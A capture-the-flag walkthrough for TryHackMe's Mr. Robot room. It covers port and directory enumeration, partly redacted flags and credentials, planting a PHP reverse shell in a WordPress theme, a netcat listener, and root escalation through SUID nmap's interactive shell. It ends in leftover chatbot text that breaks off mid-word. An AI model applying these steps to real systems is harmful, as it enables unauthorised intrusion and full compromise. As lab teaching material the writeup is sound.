Tryhackme Mr robot Walkthrough - Pentest Lab Notes
π€ TryHackMe: Robot Room - Walkthrough
Welcome to the walkthrough of the Robot room on TryHackMe, inspired by the Mr. Robot TV series. This lab focuses on web enumeration, WordPress exploitation, hash cracking, and privilege escalation techniques.
π§ Room Information
- Platform: TryHackMe
- Room Name: Robot
- Difficulty: EasyβIntermediate
- Skills Covered:
- Web Enumeration
- WordPress Vulnerabilities
- Password Hash Cracking
- Shell Access
- Privilege Escalation
π Recon & Enumeration
1
2
nmap -sC -sV -Pn <TARGET_IP>
nmap -A <TARGET_IP>
Discovered Open Ports:
1
2
3
80/tcp β HTTP
443/tcp β HTTPS
Directory Brute Forcing:
1
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Interesting Endpoints:
1
2
3
4
5
/robots.txt
/license
/wp-login.php
π© Flag 1 - Found in robots.txt
Accessing /robots.txt shows:
User-agent: * Disallow: /key-1-of-3.txt
Visiting that file reveals:
073403c8βββββββ
π Credential Discovery
From /license, we find a Base64-encoded string. Decoding:
| echo βR________________Mg==β | base64 -d |
Reveals credentials:
elliot:ER28ββ2
π₯ WordPress Exploitation
1
2
3
4
5
6
7
8
Log into /wp-login.php using Elliot's credentials.
Go to Appearance β Theme Editor.
Modify the 404.php template with a PHP reverse shell.
Start listener: ``` nc -lvnp 4444 ```
Trigger shell by visiting a nonexistent URL.
π§ Shell Access & Enumeration
Stabilize shell:
1
python3 -c 'import pty; pty.spawn("/bin/bash")'
Found key-2-of-3.txt in /home/robot/ (not readable).
Also found password.raw-md5:
c3fcd3d76192eβββββ3b
Cracked using CrackStation: β‘οΈ Password = abcdefghijklmnopqrstuvwxyz
Switch to robot:
1
su robot
Now access:
822c73956βββββ-9f959
βοΈ Privilege Escalation
Check for SUID files:
1
find / -perm -4000 -type f 2>/dev/null
Found: /usr/local/bin/nmap
Interactive Nmap exploit (via GTFOBins):
1
2
nmap --interactive
!sh
Now root! π π Final Flag
1
Read /root/key-3-of-3.txt:
π Tools & Resources Used
1
2
3
4
5
6
7
8
9
Nmap
Gobuster
CrackStation
GTFOBins
PentestMonkey PHP Shell
βοΈ Author
Your nikhil
β To Use:
- Replace
<TARGET_IP>with the IP of your deployed machine (or remove if not sharing actual commands). - Update your name and links at the bottom.
- Save this as
README.mdin your GitHub repository.
Let me know if youβd like me to help format this in a GitHub repo directly, or generate an accompany